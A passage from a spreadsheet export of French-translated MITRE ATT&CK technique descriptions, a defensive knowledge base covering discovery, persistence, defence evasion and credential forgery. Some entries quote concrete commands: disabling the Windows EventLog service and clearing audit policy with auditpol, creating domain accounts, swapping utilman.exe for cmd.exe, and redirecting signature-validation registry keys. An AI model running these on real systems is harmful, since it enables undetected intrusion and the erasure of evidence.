    <t>Les adversaires peuvent rechercher des détails sur la configuration et les paramètres du réseau, tels que les adresses IP et/ou MAC, des systèmes auxquels ils accèdent ou par le biais de la découverte d’informations sur des systèmes distants. Il existe plusieurs utilitaires d’administration du système d’exploitation qui peuvent être utilisés pour collecter ces informations. Exemples : [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102) et [route](https://attack.mitre.org/software/S0103).
Les adversaires peuvent également exploiter une [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) sur les périphériques réseau pour collecter des informations sur les configurations et les paramètres, tels que les adresses IP des interfaces configurées et les routes statiques/dynamiques (par exemple, &lt;code&gt;show ip route&lt;/code&gt;, &lt;code&gt;show ip interface&lt;/code&gt;). (Référence : US-CERT-TA18-106A)(Citation : Intrusion mondiale de Mandiant APT41)
Les adversaires peuvent utiliser les informations de [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) lors de la découverte automatisée pour façonner les comportements de suivi, y compris la détermination de certains accès au sein du réseau cible et les actions à effectuer ensuite.
https://attack.mitre.org/techniques/T1016</t>
  </si>
  <si>
    <t>Un adversaire peut supprimer une instance cloud après qu’elle a effectué des activités malveillantes dans le but d’échapper à la détection et de supprimer les preuves de sa présence.  La suppression d’une instance ou d’une machine virtuelle peut supprimer des artefacts d’investigation précieux et d’autres preuves de comportement suspect si l’instance n’est pas récupérable.
Un adversaire peut également [Créer une instance cloud](https://attack.mitre.org/techniques/T1578/002) et résilier ultérieurement l’instance après avoir atteint ses objectifs. (Citation : Mandiant M-Trends 2020)
https://attack.mitre.org/techniques/T1578/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher dans des référentiels de code publics des informations sur les victimes qui peuvent être utilisées lors du ciblage. Les victimes peuvent stocker du code dans des référentiels sur divers sites Web tiers tels que GitHub, GitLab, SourceForge et BitBucket. Les utilisateurs interagissent généralement avec les référentiels de code par le biais d’une application Web ou d’utilitaires de ligne de commande tels que git.  
Les adversaires peuvent rechercher diverses informations sur une victime dans divers référentiels de code publics. Les dépôts de code publics peuvent souvent être une source d’informations générales sur les victimes, telles que les langages de programmation et les bibliothèques couramment utilisés, ainsi que les noms des employés. Les adversaires peuvent également identifier des données plus sensibles, notamment des informations d’identification ou des clés API divulguées accidentellement. (Citation : Informations d’identification du service cloud GitHub) Les informations provenant de ces sources peuvent révéler des opportunités pour d’autres formes de reconnaissance (ex : [Phishing for Information](https://attack.mitre.org/techniques/T1598)), d’établissement de ressources opérationnelles (ex : [Comptes compromis](https://attack.mitre.org/techniques/T1586) ou [Infrastructure de compromis](https://attack.mitre.org/techniques/T1584)), et/ou d’accès initial (ex : [Comptes valides](https://attack.mitre.org/techniques/T1078) ou [Phishing]( https://attack.mitre.org/techniques/T1566)). 
**Remarque :** Ceci est distinct des [Dépôts de code](https://attack.mitre.org/techniques/T1213/003), qui se concentrent sur [Collection](https://attack.mitre.org/tactics/TA0009) à partir des dépôts de code privés et hébergés en interne.
https://attack.mitre.org/techniques/T1593/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter leurs propres charges utiles malveillantes en détournant les fichiers binaires utilisés par un installateur. Ces processus peuvent exécuter automatiquement des fichiers binaires spécifiques dans le cadre de leurs fonctionnalités ou pour effectuer d’autres actions. Si les autorisations sur le répertoire du système de fichiers contenant un binaire cible, ou les autorisations sur le binaire lui-même, ne sont pas correctement définies, le binaire cible peut être remplacé par un autre binaire à l’aide des autorisations de niveau utilisateur et exécuté par le processus d’origine. Si le processus et le thread d’origine s’exécutent sous un niveau d’autorisation supérieur, le fichier binaire remplacé s’exécutera également sous des autorisations de niveau supérieur, qui peuvent inclure SYSTEM.
Une autre variante de cette technique peut être réalisée en tirant parti d’une faiblesse courante chez les installateurs exécutables et auto-extractibles. Au cours du processus d’installation, il est courant que les installateurs utilisent un sous-répertoire dans le répertoire &lt;code&gt;%TEMP %&lt;/code&gt; pour décompresser les fichiers binaires tels que les DLL, les EXE ou d’autres charges utiles. Lorsque les programmes d’installation créent des sous-répertoires et des fichiers, ils ne définissent souvent pas les autorisations appropriées pour restreindre l’accès en écriture, ce qui permet l’exécution de code non approuvé placé dans les sous-répertoires ou l’écrasement des fichiers binaires utilisés dans le processus d’installation. Ce comportement est lié à [Détournement d’ordre de recherche DLL](https://attack.mitre.org/techniques/T1574/001) et peut en tirer parti.
Les adversaires peuvent utiliser cette technique pour remplacer des fichiers binaires légitimes par des fichiers malveillants afin d’exécuter du code à un niveau d’autorisation plus élevé. Certains programmes d’installation peuvent également exiger des privilèges élevés qui entraîneront une élévation des privilèges lors de l’exécution de code contrôlé par l’adversaire. Ce comportement est lié à [Contourner le contrôle de compte d’utilisateur](https://attack.mitre.org/techniques/T1548/002). Plusieurs exemples de cette faiblesse dans les installateurs courants existants ont été signalés aux fournisseurs de logiciels. (Référence : mozilla_sec_adv_2012)  (Citation : Les installateurs exécutables sont vulnérables) Si le processus d’exécution est configuré pour s’exécuter à un moment précis ou lors d’un certain événement (par exemple, le démarrage du système), cette technique peut également être utilisée pour la persistance.
https://attack.mitre.org/techniques/T1574/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir une persistance et/ou élever des privilèges en exécutant du contenu malveillant déclenché par des fonctionnalités d’accessibilité. Windows contient des fonctionnalités d’accessibilité qui peuvent être lancées à l’aide d’une combinaison de touches avant qu’un utilisateur ne se soit connecté (par exemple, lorsque l’utilisateur se trouve sur l’écran d’ouverture de session Windows). Un adversaire peut modifier la façon dont ces programmes sont lancés pour obtenir une invite de commande ou une porte dérobée sans se connecter au système.
Deux programmes d’accessibilité courants sont &lt;code&gt;C :\Windows\System32\sethc.exe&lt;/code&gt;, lancé lorsque la touche Maj est enfoncée cinq fois et &lt;code&gt;C :\Windows\System32\utilman.exe&lt;/code&gt;, lancé lorsque la combinaison de touches Windows + U est enfoncée. Le programme sethc.exe est souvent appelé « sticky keys » et a été utilisé par des adversaires pour un accès non authentifié via un écran de connexion de bureau à distance. (Citation : FireEye Hikit Rootkit)
Selon la version de Windows, un adversaire peut tirer parti de ces fonctionnalités de différentes manières. Les méthodes couramment utilisées par les adversaires incluent le remplacement des fichiers binaires des fonctionnalités d’accessibilité ou des pointeurs/références à ces fichiers binaires dans le registre. Dans les versions plus récentes de Windows, le fichier binaire remplacé doit être signé numériquement pour les systèmes x64, le fichier binaire doit résider dans &lt;code&gt;%systemdir %\&lt;/code&gt; et il doit être protégé par la protection des fichiers ou des ressources Windows (WFP/WRP). (Citation : DEFCON2016 Sticky Keys) La méthode de débogage [Injection d’options d’exécution de fichier image](https://attack.mitre.org/techniques/T1546/012) a probablement été découverte comme une solution de contournement potentielle, car elle ne nécessite pas le remplacement du binaire de la fonctionnalité d’accessibilité correspondante.
Pour un remplacement binaire simple sur Windows XP et versions ultérieures ainsi que sur Windows Server 2003/R2 et versions ultérieures, par exemple, le programme (par exemple, &lt;code&gt;C :\Windows\System32\utilman.exe&lt;/code&gt;) peut être remplacé par « cmd.exe » (ou un autre programme qui fournit un accès par porte dérobée). Par la suite, si vous appuyez sur la combinaison de touches appropriée sur l’écran de connexion alors que vous êtes assis devant le clavier ou lorsque vous êtes connecté via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001), le fichier remplacé sera exécuté avec les privilèges SYSTEM. (Référence : Tilbury 2014)
D’autres caractéristiques d’accessibilité existent qui peuvent également être exploitées de la même manière : (Citation : DEFCON2016 Sticky Keys) (Référence : Abus d’accessibilité du Narrateur)
* Clavier à l’écran : &lt;code&gt;C :\Windows\System32\osk.exe&lt;/code&gt;
* Loupe : &lt;code&gt;C :\Windows\System32\Magnify.exe&lt;/code&gt;
* Narrateur : &lt;code&gt;C :\Windows\System32\Narrator.exe&lt;/code&gt;
* Commutateur d’affichage : &lt;code&gt;C :\Windows\System32\DisplaySwitch.exe&lt;/code&gt;
* Sélecteur d’applications : &lt;code&gt;C :\Windows\System32\AtBroker.exe&lt;/code&gt;
https://attack.mitre.org/techniques/T1546/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent désactiver la journalisation des événements Windows afin de limiter les données qui peuvent être exploitées pour les détections et les audits. Les journaux d'événements Windows enregistrent les activités des utilisateurs et du système, telles que les tentatives d'ouverture de session, la création de processus et bien d'autres choses encore (Citation : Windows Log Events) Ces données sont utilisées par les outils de sécurité et les analystes pour générer des détections.
Le service EventLog conserve les journaux d'événements provenant de divers composants et applications du système (Citation : EventLog_Core_Technologies). Par défaut, le service démarre automatiquement lorsqu'un système est mis sous tension. Une politique d'audit, gérée par la stratégie de sécurité locale (secpol.msc), définit les événements du système que le service EventLog enregistre. Les paramètres de la politique d'audit de sécurité peuvent être modifiés en exécutant secpol.msc, puis en accédant à &lt;code&gt;Paramètres de sécurité - Politiques locales - Politique d'audit&lt;/code&gt; pour les paramètres de base de la politique d'audit ou à &lt;code&gt;Paramètres de sécurité - Configuration avancée de la politique d'audit&lt;/code&gt; pour les paramètres avancés de la politique d'audit.(Citation : Audit_Policy_Microsoft)(Citation : Advanced_sec_audit_policy_settings) &lt;code&gt;auditpol.exe&lt;/code&gt; peut également être utilisé pour définir les politiques d'audit.(Citation : auditpol)
Les adversaires peuvent cibler la journalisation de l'ensemble du système ou seulement celle d'une application particulière. Par exemple, le service Windows EventLog peut être désactivé à l'aide des commandes &lt;code&gt;Set-Service -Name EventLog -Status Stopped&lt;/code&gt; ou &lt;code&gt;sc config eventlog start=disabled&lt;/code&gt; (suivies de l'arrêt manuel du service à l'aide de &lt;code&gt;Stop-Service -Name EventLog&lt;/code&gt;). (Citation : Disable_Win_Event_Logging)(Citation : disable_win_evt_logging) En outre, le service peut être désactivé en modifiant la valeur « Start » dans &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog&lt;/code&gt; puis en redémarrant le système pour que la modification prenne effet.(Citation : disable_win_evt_logging)
Il existe plusieurs façons de désactiver le service EventLog en modifiant la clé de registre. Premièrement, sans les privilèges de l'administrateur, les adversaires peuvent modifier la valeur "Start" dans la clé &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security&lt;/code&gt;, puis redémarrer le système pour désactiver le journal des événements de sécurité. (Citation : winser19_file_overwrite_bug_twitter) Deuxièmement, avec les privilèges de l'administrateur, les adversaires peuvent modifier les mêmes valeurs dans &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System&lt;/code&gt; et &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application&lt;/code&gt; pour désactiver l'ensemble de l'EventLog. (Citation : disable_win_evt_logging)
En outre, les adversaires peuvent utiliser &lt;code&gt;auditpol&lt;/code&gt; et ses sous-commandes dans une invite de commande pour désactiver l'audit ou effacer la politique d'audit. Pour activer ou désactiver un paramètre ou une catégorie d'audit spécifique, les adversaires peuvent utiliser les paramètres &lt;code&gt;/success&lt;/code&gt; ou &lt;code&gt;/failure&lt;/code&gt;. Par exemple, &lt;code&gt;auditpol /set /category : « Account Logon » /success:disable /failure:disable&lt;/code&gt; désactive l'audit pour la catégorie Account Logon.(Citation : auditpol.exe_STRONTIC)(Citation : T1562.002_redcanaryco) Pour effacer la politique d'audit, les adversaires peuvent exécuter les lignes suivantes : &lt;code&gt;auditpol /clear /y&lt;/code&gt; ou &lt;code&gt;auditpol /remove /allusers&lt;/code&gt;.(Citation : T1562.002_redcanaryco)
En désactivant la journalisation des événements Windows, les adversaires peuvent opérer en laissant moins de preuves d'une compromission.
https://attack.mitre.org/techniques/T1562/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent altérer les composants du SIP et du fournisseur de confiance pour tromper le système d'exploitation et les outils de contrôle des applications lorsqu'ils effectuent des contrôles de validation des signatures. En mode utilisateur, les signatures numériques Windows Authenticode (Citation : Microsoft Authenticode) sont utilisées pour vérifier l'origine et l'intégrité d'un fichier, variables qui peuvent être utilisées pour établir la confiance dans un code signé (ex : un pilote avec une signature Microsoft valide peut être considéré comme sûr). Le processus de validation de la signature est géré par la fonction WinVerifyTrust de l'interface de programmation d'application (API) (Citation : Microsoft WinVerifyTrust) qui accepte une demande et se coordonne avec le fournisseur de confiance approprié, qui est responsable de la validation des paramètres d'une signature. (Citation : SpectorOps Subverting Trust Sept 2017)
En raison de la diversité des types de fichiers exécutables et des formats de signature correspondants, Microsoft a créé des composants logiciels appelés « Subject Interface Packages » (SIP) (Citation : EduardosBlog SIPs July 2008) pour fournir une couche d'abstraction entre les fonctions de l'API et les fichiers. Les SIP permettent aux fonctions API de créer, d'extraire, de calculer et de vérifier les signatures. Des SIP uniques existent pour la plupart des formats de fichiers (Executable, PowerShell, Installer, etc., la signature de catalogue fournissant un fourre-tout (Citation : Microsoft Catalog Files and Signatures April 2017)) et sont identifiés par des identifiants uniques globaux (GUID). (Citation : SpectorOps Subverting Trust Sept 2017)
Comme dans le cas de [Code Signing] (https://attack.mitre.org/techniques/T1553/002), les adversaires peuvent abuser de cette architecture pour subvertir les contrôles de confiance et contourner les politiques de sécurité qui n'autorisent que les codes légitimement signés à s'exécuter sur un système. Les adversaires peuvent détourner les composants du SIP et du fournisseur de confiance pour tromper le système d'exploitation et les outils de contrôle des applications et classer un code malveillant (ou n'importe quel code) comme étant signé par un fournisseur de confiance : (Citation : SpectorOps Subverting Trust Sept 2017)
* Modifier les valeurs de registre &lt;code&gt;Dll&lt;/code&gt; et &lt;code&gt;FuncName&lt;/code&gt; dans &lt;code&gt;HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}&lt;/code&gt; qui pointent vers la bibliothèque de liens dynamiques (DLL) fournissant la fonction CryptSIPDllGetSignedDataMsg d'un SIP, qui récupère un certificat numérique codé à partir d'un fichier signé. En pointant vers une DLL malicieusement fabriquée avec une fonction exportée qui renvoie toujours une bonne valeur de signature connue (ex : une signature Microsoft pour les exécutables portables) plutôt que la signature réelle du fichier, un adversaire peut appliquer une valeur de signature acceptable à tous les fichiers utilisant ce SIP (Citation : GitHub SIP POC Sept 2017) (bien qu'une discordance de hachage se produira probablement, invalidant la signature, puisque le hachage renvoyé par la fonction ne correspondra pas à la valeur calculée à partir du fichier).
Modifier les valeurs des registres Dll et FuncName ii &lt;code&gt;HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}&lt;/code&gt; qui pointent vers la DLL fournissant la fonction CryptSIPDllVerifyIndirectData d'un SIP, qui valide le hachage calculé d'un fichier par rapport à la valeur de hachage signée. En pointant vers une DLL malicieusement fabriquée avec une fonction exportée qui renvoie toujours TRUE (indiquant que la validation a réussi), un adversaire peut valider avec succès n'importe quel fichier (avec une signature légitime) en utilisant ce SIP (Citation : GitHub SIP POC Sept 2017) (avec ou sans détournement de la fonction CryptSIPDllGetSignedDataMsg mentionnée précédemment). Cette valeur de registre pourrait également être redirigée vers une fonction exportée appropriée d'une DLL déjà présente, ce qui éviterait de devoir déposer et exécuter un nouveau fichier sur le disque.
* Modifier les valeurs du registre des DLL et des fonctions dans &lt;code&gt;HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{guid du fournisseur de confiance}&lt;/code&gt; qui pointent vers la DLL fournissant la fonction FinalPolicy d'un fournisseur de confiance, qui est l'endroit où la signature décodée et analysée est vérifiée et où la majorité des décisions de confiance sont prises. Comme pour le détournement de la fonction CryptSIPDllVerifyIndirectData de SIP, cette valeur peut être redirigée vers une fonction exportée appropriée d'une DLL déjà présente ou d'une DLL malicieusement fabriquée (bien que la mise en œuvre d'un fournisseur de confiance soit complexe).
**Note:** Les détournements ci-dessus sont également possibles sans modifier le registre via [DLL Search Order Hijacking] (https://attack.mitre.org/techniques/T1574/001).
Le détournement de composants SIP ou de fournisseurs de confiance peut également permettre une exécution de code persistante, car ces composants malveillants peuvent être invoqués par toute application qui effectue une signature de code ou une validation de signature. (Citation : SpectorOps Subverting Trust Sept 2017)
https://attack.mitre.org/techniques/T1553/003"</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des configurations d'autorisation qui leur permettent d'obtenir un accès temporairement élevé aux ressources de l'informatique en nuage. De nombreux environnements en nuage permettent aux administrateurs d'accorder aux comptes d'utilisateurs ou de services la permission de demander un accès juste à temps à des rôles, d'usurper l'identité d'autres comptes, de transmettre des rôles à des ressources et à des services, ou d'obtenir un accès à court terme à un ensemble de privilèges qui peuvent être distincts des leurs.
L'accès juste à temps est un mécanisme qui permet d'accorder des rôles supplémentaires aux comptes cloud de manière granulaire et temporaire. Cela permet aux comptes de fonctionner avec les seules autorisations dont ils ont besoin au quotidien, et de demander des autorisations supplémentaires si nécessaire. Parfois, les demandes d'accès juste à temps sont configurées pour nécessiter une approbation manuelle, tandis que d'autres fois, les autorisations souhaitées sont automatiquement accordées.(Citation : Azure Just in Time Access 2023)
L'usurpation d'identité permet aux comptes d'utilisateurs ou de services d'agir temporairement avec les autorisations d'un autre compte. Par exemple, dans GCP, les utilisateurs ayant le rôle `iam.serviceAccountTokenCreator` peuvent créer des jetons d'accès temporaires ou signer des charges utiles arbitraires avec les autorisations d'un compte de service, tandis que les comptes de service ayant l'autorisation de délégation à l'échelle du domaine sont autorisés à se faire passer pour des comptes Google Workspace. (Citation : Google Cloud Service Account Authentication Roles)(Citation : Hunters Domain Wide Delegation Google Workspace 2023)(Citation : Google Cloud Just in Time Access 2023)(Citation : Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023) Dans Exchange Online, le rôle `ApplicationImpersonation` permet à un compte de service d'utiliser les autorisations associées aux comptes d'utilisateurs spécifiés.(Citation : Microsoft Impersonation and EWS in Exchange)
De nombreux environnements en nuage comprennent également des mécanismes permettant aux utilisateurs de confier des rôles à des ressources qui leur permettent d'effectuer des tâches et de s'authentifier auprès d'autres services. Si l'utilisateur qui crée la ressource n'assume pas directement le rôle qu'il lui attribue, il peut néanmoins tirer parti de l'accès au rôle, par exemple en configurant la ressource pour qu'elle effectue certaines actions avec les autorisations qui lui ont été accordées. Dans AWS, les utilisateurs disposant de l'autorisation `PassRole` peuvent permettre à un service qu'ils créent d'assumer un rôle donné, tandis que dans GCP, les utilisateurs disposant du rôle `iam.serviceAccountUser` peuvent attacher un compte de service à une ressource.(Citation : AWS PassRole)(Citation : Rôles d'authentification du compte de service Google Cloud)
Si les utilisateurs doivent se voir attribuer des rôles spécifiques pour pouvoir utiliser l'une ou l'autre de ces fonctionnalités, les administrateurs du cloud peuvent mal configurer les autorisations. Cela peut entraîner des voies d'escalade qui permettent à des adversaires d'accéder à des ressources au-delà de ce qui était prévu à l'origine.(Citation : Rhino Google Cloud Privilege Escalation)(Citation : Rhino Security Labs AWS Privilege Escalation)
**Note:** cette technique est différente de [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), qui implique l'attribution de rôles permanents aux comptes plutôt que d'abuser des structures de permissions existantes pour obtenir un accès temporairement élevé aux ressources. Cependant, les adversaires qui compromettent un compte suffisamment privilégié peuvent accorder à un autre compte qu'ils contrôlent des [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) qui leur permettraient également d'abuser de ces fonctionnalités. Cela peut également permettre une plus grande discrétion que si l'on utilisait directement le compte hautement privilégié, en particulier lorsque les journaux ne précisent pas quand l'usurpation de rôle a lieu. (Citation : CrowdStrike StellarParticle January 2022)
https://attack.mitre.org/techniques/T1548/005"</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</si>
  <si>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</si>
  <si>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Les adversaires peuvent exploiter les ressources de bande passante réseau des systèmes cooptés pour effectuer des tâches gourmandes en ressources, ce qui peut avoir un impact sur la disponibilité du système et/ou des services hébergés. 
Les adversaires peuvent également utiliser des logiciels malveillants qui exploitent la bande passante réseau d’un système dans le cadre d’un botnet afin de faciliter les campagnes de [déni de service du réseau](https://attack.mitre.org/techniques/T1498) et/ou d’amorcer des torrents malveillants. (Citation : GoBotKR) Alternativement, ils peuvent se livrer au proxyjacking en vendant l’utilisation de la bande passante du réseau et de l’adresse IP des victimes à des services de proxyware. (Citation : Sysdig Proxyjacking) Enfin, ils peuvent effectuer une analyse à l’échelle d’Internet afin d’identifier d’autres cibles de compromission. (Citation : Unité 42 Variables d’environnement divulguées 2024)
En plus d’entraîner des coûts financiers potentiels ou des interruptions de disponibilité, cette technique peut nuire à la réputation si la bande passante d’une victime est utilisée pour des activités illégales. (Citation : Sysdig Proxyjacking)
https://attack.mitre.org/techniques/T1496/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’obtenir une liste de comptes, de noms d’utilisateur ou d’adresses e-mail valides sur un système ou dans un environnement compromis. Ces informations peuvent aider les adversaires à déterminer quels comptes existent, ce qui peut faciliter les comportements ultérieurs tels que le brute-forcing, les attaques de spear-phishing ou les prises de contrôle de comptes (par exemple, [Comptes valides](https://attack.mitre.org/techniques/T1078)).
Les adversaires peuvent utiliser plusieurs méthodes pour énumérer les comptes, notamment l’utilisation abusive des outils existants, des commandes intégrées et des erreurs de configuration potentielles qui divulguent des noms de comptes, des rôles ou des autorisations dans l’environnement ciblé.
Par exemple, les environnements cloud fournissent généralement des interfaces facilement accessibles pour obtenir des listes d’utilisateurs. (Citation : Utilisateurs de la liste AWS)(citation : Google Cloud - API de liste de comptes IAM Servie) Sur les hôtes, les adversaires peuvent utiliser [PowerShell](https://attack.mitre.org/techniques/T1059/001) par défaut et d’autres fonctionnalités de ligne de commande pour identifier les comptes. Les informations sur les adresses e-mail et les comptes peuvent également être extraites en recherchant les fichiers d’un système infecté.
https://attack.mitre.org/techniques/T1087</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser un proxy de connexion pour diriger le trafic réseau entre les systèmes ou agir en tant qu’intermédiaire pour les communications réseau vers un serveur de commande et de contrôle afin d’éviter les connexions directes à leur infrastructure. Il existe de nombreux outils qui permettent la redirection du trafic via des proxys ou la redirection de port, notamment [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy et ZXPortMap. (Citation : Outils d’attaque APT de Trend Micro) Les adversaires utilisent ces types de proxys pour gérer les communications de commande et de contrôle, réduire le nombre de connexions réseau sortantes simultanées, assurer la résilience face à la perte de connexion ou contourner les voies de communication fiables existantes entre les victimes afin d’éviter les soupçons. Les adversaires peuvent enchaîner plusieurs proxys pour dissimuler davantage la source du trafic malveillant.
Les adversaires peuvent également tirer parti des schémas de routage dans les réseaux de diffusion de contenu (CDN) pour proxy de commande et contrôler le trafic.
https://attack.mitre.org/techniques/T1090</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des interpréteurs de commandes et de scripts pour exécuter des commandes, des scripts ou des fichiers binaires. Ces interfaces et langages permettent d’interagir avec les systèmes informatiques et sont communs à de nombreuses plates-formes différentes. La plupart des systèmes sont livrés avec une interface de ligne de commande intégrée et des capacités de script, par exemple, les distributions macOS et Linux incluent une version de [Unix Shell](https://attack.mitre.org/techniques/T1059/004) tandis que les installations Windows incluent le [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) et [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Il existe également des interpréteurs multiplateformes tels que [Python](https://attack.mitre.org/techniques/T1059/006), ainsi que ceux couramment associés à des applications clientes telles que [JavaScript](https://attack.mitre.org/techniques/T1059/007) et [Visual Basic](https://attack.mitre.org/techniques/T1059/005).
Les adversaires peuvent abuser de ces technologies de diverses manières afin d’exécuter des commandes arbitraires. Les commandes et les scripts peuvent être intégrés dans les charges utiles [Accès initial](https://attack.mitre.org/tactics/TA0001) fournies aux victimes sous forme de documents de leurre ou de charges utiles secondaires téléchargées à partir d’un C2 existant. Les adversaires peuvent également exécuter des commandes via des terminaux/shells interactifs, ainsi qu’utiliser divers [Services à distance](https://attack.mitre.org/techniques/T1021) afin d’effectuer une exécution à distance. (Citation : Commandes à distance Powershell)(Citation : Cisco IOS Software Integrity Assurance - Historique des commandes)(citation : Exécution de shell à distance en Python)
https://attack.mitre.org/techniques/T1059</t>
  </si>
  <si>
    <t>Un adversaire peut tenter de bloquer la collecte et l’analyse d’indicateurs ou d’événements généralement capturés par les capteurs. Il peut s’agir d’une redirection malveillante (Citation : Microsoft Lamin Septembre 2017) ou même de la désactivation de capteurs basés sur l’hôte, tels que le suivi d’événements pour Windows (ETW) (Référence : Microsoft À propos du suivi d’événements 2018), en modifiant les paramètres qui contrôlent la collecte et le flux de la télémétrie d’événements. (Citation : Medium Event Tracing Tampering 2018) Ces paramètres peuvent être stockés sur le système dans des fichiers de configuration et/ou dans le registre, et être accessibles via des utilitaires d’administration tels que [PowerShell](https://attack.mitre.org/techniques/T1059/001) ou [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
Par exemple, les adversaires peuvent modifier la valeur 'File' dans &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security&lt;/code&gt; pour masquer leurs actions malveillantes dans un fichier journal .evtx nouveau ou différent. Cette action ne nécessite pas de redémarrage du système et prend effet immédiatement. (Référence : disable_win_evt_logging) 
L’interruption ETW peut être réalisée de plusieurs façons, mais la plus directement en définissant des conditions à l’aide de l’applet de commande [PowerShell](https://attack.mitre.org/techniques/T1059/001) &lt;code&gt;Set-EtwTraceProvider&lt;/code&gt; ou en s’interfaçant directement avec le Registre pour apporter des modifications.
Dans le cas de la génération de rapports d’indicateurs basée sur le réseau, un adversaire peut bloquer le trafic associé aux rapports pour empêcher l’analyse centrale. Cela peut se faire par de nombreux moyens, tels que l’arrêt d’un processus local responsable du transfert des données de télémétrie et/ou la création d’une règle de pare-feu basée sur l’hôte pour bloquer le trafic vers des hôtes spécifiques responsables de l’agrégation des événements, tels que les produits de gestion des informations et des événements de sécurité (SIEM).
Dans les environnements Linux, les adversaires peuvent désactiver ou reconfigurer les outils de traitement des journaux tels que syslog ou nxlog pour inhiber les capacités de détection et de surveillance afin de faciliter les comportements de suivi (Citation : LemonDuck).
https://attack.mitre.org/techniques/T1562/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer un compte de domaine pour maintenir l’accès aux systèmes des victimes. Les comptes de domaine sont ceux gérés par les services de domaine Active Directory où l’accès et les autorisations sont configurés sur les systèmes et services qui font partie de ce domaine. Les comptes de domaine peuvent couvrir les comptes d’utilisateur, d’administrateur et de service. Avec un niveau d’accès suffisant, la commande &lt;code&gt;net user /add /domain&lt;/code&gt; peut être utilisée pour créer un compte de domaine. (Référence : Savill 1999)
Ces comptes peuvent être utilisés pour établir un accès secondaire authentifié qui ne nécessite pas le déploiement d’outils d’accès à distance persistants sur le système.
https://attack.mitre.org/techniques/T1136/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir les noms des employés qui peuvent être utilisés lors du ciblage. Les noms des employés doivent être utilisés pour dériver des adresses e-mail ainsi que pour aider à guider d’autres efforts de reconnaissance et/ou à créer des leurres plus crédibles.
Les adversaires peuvent facilement recueillir les noms des employés, car ils peuvent être facilement accessibles et exposés par le biais d’articles en ligne ou d’autres ensembles de données accessibles (p. ex., [Médias sociaux](https://attack.mitre.org/techniques/T1593/001) ou [Sites Web appartenant à des victimes de recherche](https://attack.mitre.org/techniques/T1594)). (Citation : Fuite OPM)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compromis](https://attack.mitre.org/techniques/T1586)), et/ou l’accès initial (ex : [Phishing](https://attack.mitre.org/techniques/T1566) ou [Comptes valides]( https://attack.mitre.org/techniques/T1078)).
https://attack.mitre.org/techniques/T1589/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de recueillir des informations sur les relations d’approbation de domaine qui peuvent être utilisées pour identifier les opportunités de mouvement latéral dans les environnements multidomaines/forestiers Windows. Les approbations de domaine fournissent un mécanisme permettant à un domaine d’autoriser l’accès aux ressources en fonction des procédures d’authentification d’un autre domaine. (Citation : Microsoft Trusts) Les approbations de domaine permettent aux utilisateurs du domaine approuvé d’accéder aux ressources du domaine d’approbation. Les informations découvertes peuvent aider l’adversaire à effectuer [Injection d’historique SID](https://attack.mitre.org/techniques/T1134/005), [Passer le billet](https://attack.mitre.org/techniques/T1550/003) et [Kerberoasting](https://attack.mitre.org/techniques/T1558/003). (Citation : AdSecurity Forging Trust Tickets)(Citation : Harmj0y Domain Trusts) Les approbations de domaine peuvent être énumérées à l’aide de l’appel d’API Win32 « DSEnumerateDomainTrusts() », des méthodes .NET et LDAP. (Citation : Harmj0y Domain Trusts) L’utilitaire Windows [Nltest](https://attack.mitre.org/software/S0359) est connu pour être utilisé par des adversaires pour énumérer les approbations de domaine. (Citation : Opération Microsoft Wilysupply)
https://attack.mitre.org/techniques/T1482</t>
  </si>
  <si>
    <t>Les adversaires qui disposent du hachage de mot de passe du compte KRBTGT peuvent falsifier des tickets d’octroi de tickets Kerberos (TGT), également appelés tickets d’or. (Citation : AdSecurity Kerberos GT août 2015) Les tickets d’or permettent aux adversaires de générer du matériel d’authentification pour n’importe quel compte dans Active Directory. (Citation : CERT-EU Golden Ticket Protection) 
À l’aide d’un ticket d’or, les adversaires peuvent ensuite demander des tickets TGS (Ticket granting Service), qui permettent d’accéder à des ressources spécifiques. Les tickets d’or nécessitent que les adversaires interagissent avec le Key Distribution Center (KDC) afin d’obtenir le TGS. (Citation : ADSecurity détecte les tickets falsifiés)
